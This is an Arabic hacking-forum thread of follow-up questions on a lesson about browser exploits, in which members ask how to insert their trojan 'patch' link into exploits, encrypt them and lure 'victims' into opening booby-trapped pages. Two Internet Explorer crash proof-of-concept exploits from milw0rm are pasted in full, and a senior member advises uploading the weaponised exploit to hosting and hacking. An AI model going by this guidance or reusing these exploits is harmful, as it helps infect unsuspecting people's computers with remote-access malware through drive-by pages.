استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

تم تحميل الصفحة في 0,8971350 ثانية
استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]
إنضم
11 يونيو 2007
المشاركات
207
الإعجابات
39
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

مشكورين على الشروحات المميزه دى

كان عندى استفسارات لو تكرمتم

1 _ هل اكتب فى خانة البحث نوع المتصفح بس يعنى firfox مثلا ولا لازم احدد رقم الاصدار مثلا explorer 7

2 _ ازاى اعرف رقم الاصدار ( انا عندى internet explorer ) بتاعى

3 _ فى خطوة استبدال رابط الباتش برابط الباتش بتاعى ..اطلع مكان وضع الباتش ازاى ؟

يعنى الاخ عدنان كان كاتب فى الشرح كلمة ( رابط باتشك ) طب فى الثغره اللى انزلها من الموقع

ياترى اعرف مكان وضع رابط اباتش ازاى ؟


4 _ هل الثغره اللى موجوده فى الشرح تنفع فى شرح عمل صفحه ملغومه من الالف للياء للمبدع ابو عدنان ؟

اعذرونى على الاسئله الكتير

مشكورين مره تانيه على الشروحات


ابداع فى ابداع
 

anT!-Tr0J4n

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
7 يناير 2008
المشاركات
5,504
الإعجابات
386
النقاط
83
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

_ هل اكتب فى خانة البحث نوع المتصفح بس يعنى firfox مثلا ولا لازم احدد رقم الاصدار مثلا explorer 7
انت وراحتك لو حابب تبحث عن اصدار معين اكتب الاصدار لو مش حابب هتكتب الفير فوكس او الاكسبلور او غيرهم وتشوف جميع الثغرات لكل الاصدارات الخاصة بيهم

والثغرة بيكون موجود فى عنوانها الاصدار التى تعمل عليه ~

_ ازاى اعرف رقم الاصدار ( انا عندى internet explorer ) بتاعى
افتح الاكسبلور فوق هتلاقى كلمة help

اضغط عليها انزل لاخر واحدة

about internet explorer

_ فى خطوة استبدال رابط الباتش برابط الباتش بتاعى ..اطلع مكان وضع الباتش ازاى ؟
حسب مكتشف الثغرة هيكون واضعلك موقع وهمى كجوجل او موقعه
 

ALG.dz

Beginner Developer
rank
إنضم
28 أكتوبر 2009
المشاركات
7
الإعجابات
0
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

نعم

اخى عندما اضع الباتش في الصفحة الملغمة واكتب مثلا صورة ************
فهل بمجرد ان يضغط على الصورة (واضع الرابط فيها) يكون الباتش في جهازه ؟
 
إنضم
25 أكتوبر 2009
المشاركات
374
الإعجابات
22
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

أخ ابو عندنان


يعطيك العافية صراحة دورة مميزة


بالنسبة للدرس ده انتا شرحت على ثغرة من عندك

ولكن في موقع الــhttp://www.milw0rm.com/ lh ما بيكون مكتوب ضع باتشك هنا

ازاي حاعرفها

وتاني شي يا ريت لو تشوفلي هالثغرة

من الموقع بتاعها

http://www.milw0rm.com/exploits/8079

اتمنى من الرد
نريد الفهم والاستفادة
 

bondoq

Beginner Developer
rank
إنضم
17 نوفمبر 2006
المشاركات
71
الإعجابات
5
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

السلام عليكم ورحمه الله وبركاته

المبدع ابو عدنان وانتي تروجان وكل مبدعي القسم اجمل تحيه

معلش في بعض النقاط اللي حابب اسأل عليها اتمني ان يتسع ليها صدركم

ا/ ابو عدنان كاتب اننا نستبدل الباتش برابط الباتش المباشر >> انا لما بنزل الثغره من الموقع مبيكونش لسه عدلت عليها ولا حطيت فيها باتش

2/ انا نزلت الثغره دي

<html>
<head>
<title> Irfan Asrar</title>
</head>
<body onload="c()">
Set Attribute Crash : Tested with IE7 Vista
IE6 XP2
IE6 XP3

<script type="text/javascript">

function c() {

var li = document.createElement("li");
li.setAttribute("value", "1");
li.value = "1";

}

</script>
</body>
</html>

# milw0rm.com [2009-08-18]
http://www.milw0rm.com/exploits/9455

وده الرابط بتاعها

ياتري اقدر اعدل علي ايه بالظبط علشان احط رابط الباتش


3\ هل لو عملت ثغره مثلا لمتصفح انترنت اكسبلور 7 وشفرتها وتمام وكانت للاكس بي س.ب 2

وفي ضحيه بيستعمل انترنت اكسبلور 8 مثلا ونظامه فيستا هل تنفع معاه ؟؟

وياتري ازاي اقدر اجيب ضحايا بالثغره ؟؟ هل اني ابعتلهم الصفحه ويفتحوها ؟؟

معلش لو اسألتي كتير بس الدوره للمبتدأين >> معرفش اي حاجه عن ثغرات المتصفح <<



اتمني يكون قصدي مفهوم وليكم جزيل الشكر

:32:
 

Dr.AdNaN

.:: Legends DeveloPer ::.
rankrankrankrank
إنضم
26 ديسمبر 2006
المشاركات
1,797
الإعجابات
553
النقاط
113
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

:15:

ياخوان في بعض الثغرات مايكون فيها رابط

بس تسبب كراش :32:
 
إنضم
25 أكتوبر 2009
المشاركات
185
الإعجابات
4
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

نفس السؤال شلون نعرف المكان الي نبي نحط رابط الباتش به دامك تقول مو كل الثغرات تحتوي على رابط وهمي

سؤال ثاني وش تقصد بـ كراش

مشكور اخوي
 

Dr.omar

Beginner Developer
rank
إنضم
24 أكتوبر 2009
المشاركات
43
الإعجابات
1
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

:8::8:


يالغلاا ، نفس اسئلت الآخون ، وكيف اعرف مكان ، وضع الباتش , وكيف اعرف الثغره الي تحتاج رابط او لا،


PHP:
<[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B] [B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]="Context-Type" content="text/html; charset=US-ASCII">
<!--
Contact:[email protected],[email protected]
Title: MS Internet Explorer findText Unicode Parsing error
Vulnerability (mshtml.dll) 
Bug discovered: Hong10 
PoC code: AmesianX & Hong10 
Critical: low 
Impact: MS Internet Explorer 7/8 Crash 
Where: From remote 
Tested Operating System: Windows XP SP3 FULL PATCHED (Korean Language) 

Solution: I don't know.. 

Description: 
 The following bug was tested on the latest version of Internet 
Explorer 7/8. 

by research team NSHC
--> 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>IE findText crash</title>
<[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B] [B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]="Content-Type" content="text/html; charset=utf-8"></head><body>
<input type="button" value="exploit" onclick="do_crash();">
Hit the button after ie7/8 crash..
[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]
function do_crash()
{
var o1=document.createElement("input");
o1.type="text";  //or password
o1.id="powerhacker";
o1.value="AAAA";
document.body.appendChild(o1);
var r= o1.createTextRange();
r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1);
//maybe string length allocated stack but over length allocated heap memory
//r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072);
//this code is no crash becase 3 parameter 
}
</script>
</body></html>
<html><body></body></html>

# milw0rm.com [2009-07-24]

في امان الله :31::28:
 
إنضم
16 مايو 2008
المشاركات
3,864
الإعجابات
210
النقاط
63
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

مدري شفيها الصصور ..

ماتطلع عنــدي
 
إنضم
28 أكتوبر 2009
المشاركات
78
الإعجابات
0
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

يآخوآن انا الحين شفرت الثغره وكل شي وش اسوي فيها وين اوديها الحين يآليت تردون علي لاهنتو
 

anT!-Tr0J4n

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
7 يناير 2008
المشاركات
5,504
الإعجابات
386
النقاط
83
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

كراش يعنى تهنيج المتصفح واغلاقة

/

مكان الرابط قولنا قبل كدا فى الرد السابق حسب المكتشف وخبرتك بلثغرات

،،

بعد تشفير الثغرة ووضع رابط باتشك بها وكله تمام ارفعها على مساحة واخترق
 
إنضم
28 أكتوبر 2009
المشاركات
78
الإعجابات
0
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

يعطيكـ آلــف عآفية يآلـ غلآ ومشكوور علىآ ردكـ آلـسآبق

بسس يآلـ غلآ اذ1 رفعتهآ يطلع شريط اصفر فوق وقلق :15:

مآفيه ثغرة تلقآئية يعني انا اعرف البعض يرسل لك الرابط واول مايفتح الضحية الرآبط على طول الباتش ينزل في جهآزة

لو فيه ثغرة زي كذ1 يآليتـ تعلمونآ او تعطونا ثغرآت تلقآئية لآ هنتو :30: :30:
 

wXer

DeveloPer Plus
rankrankrankrank
إنضم
14 يوليو 2009
المشاركات
1,227
الإعجابات
102
النقاط
63
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

يعطيك العافية كابوو :32:

ولكن ياليت تشرح لنا انواع الثغرات ومعرفة مكان وضع رابط الباتش

وتفيدنا بخبرتك
 

anT!-Tr0J4n

.:: Legends DeveloPer ::.
rankrankrankrankrankrank
إنضم
7 يناير 2008
المشاركات
5,504
الإعجابات
386
النقاط
83
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

الشريط الاصفر نتيجة ان الثغرة مش تلقآئية [ اكتيف ]

توجود ثغرات تلقائية ونادر لما تحلصها اللى معاه ثغرة محتفظ بيها برايفت لنفسة او تترقع باقرب وقت



 
إنضم
22 مايو 2009
المشاركات
235
الإعجابات
19
النقاط
18
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

بعد فتح الثغرة بالمفكرة

الحيـن نحط في البحث عن ~

نحفظ شغلنـآ ~
مافهمت فتحنا الثغرة بالمفكرة نحط في لابحث اي بحث نفسه في المفكرة ولا وين بالضبط :25:
 
إنضم
10 يناير 2010
المشاركات
36
الإعجابات
0
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

يعطيكم الف عافية


سؤال بسيط : هل من اللازم تشفير الباتش الي حنرفعه ولا بس كذا من دون تشفير بس نشفر الثغرة ؟

بانتظاركم
 
إنضم
10 يناير 2010
المشاركات
36
الإعجابات
0
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

يا أخوان ..


سؤال بسيط : هل من اللازم تشفير الباتش الي حنرفعه ولا بس كذا من دون تشفير بس نشفر الثغرة ؟

بانتظاركم
 
إنضم
17 يناير 2010
المشاركات
69
الإعجابات
10
النقاط
0
رد: استفسارت الدرس الخامس عشر [ ثغرات المتصفح ]

السلام عليكم يالغالي

اعتذر بس الصور مو ظاهرة في الشرح

لو تفضلت علينا

:32:
 

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل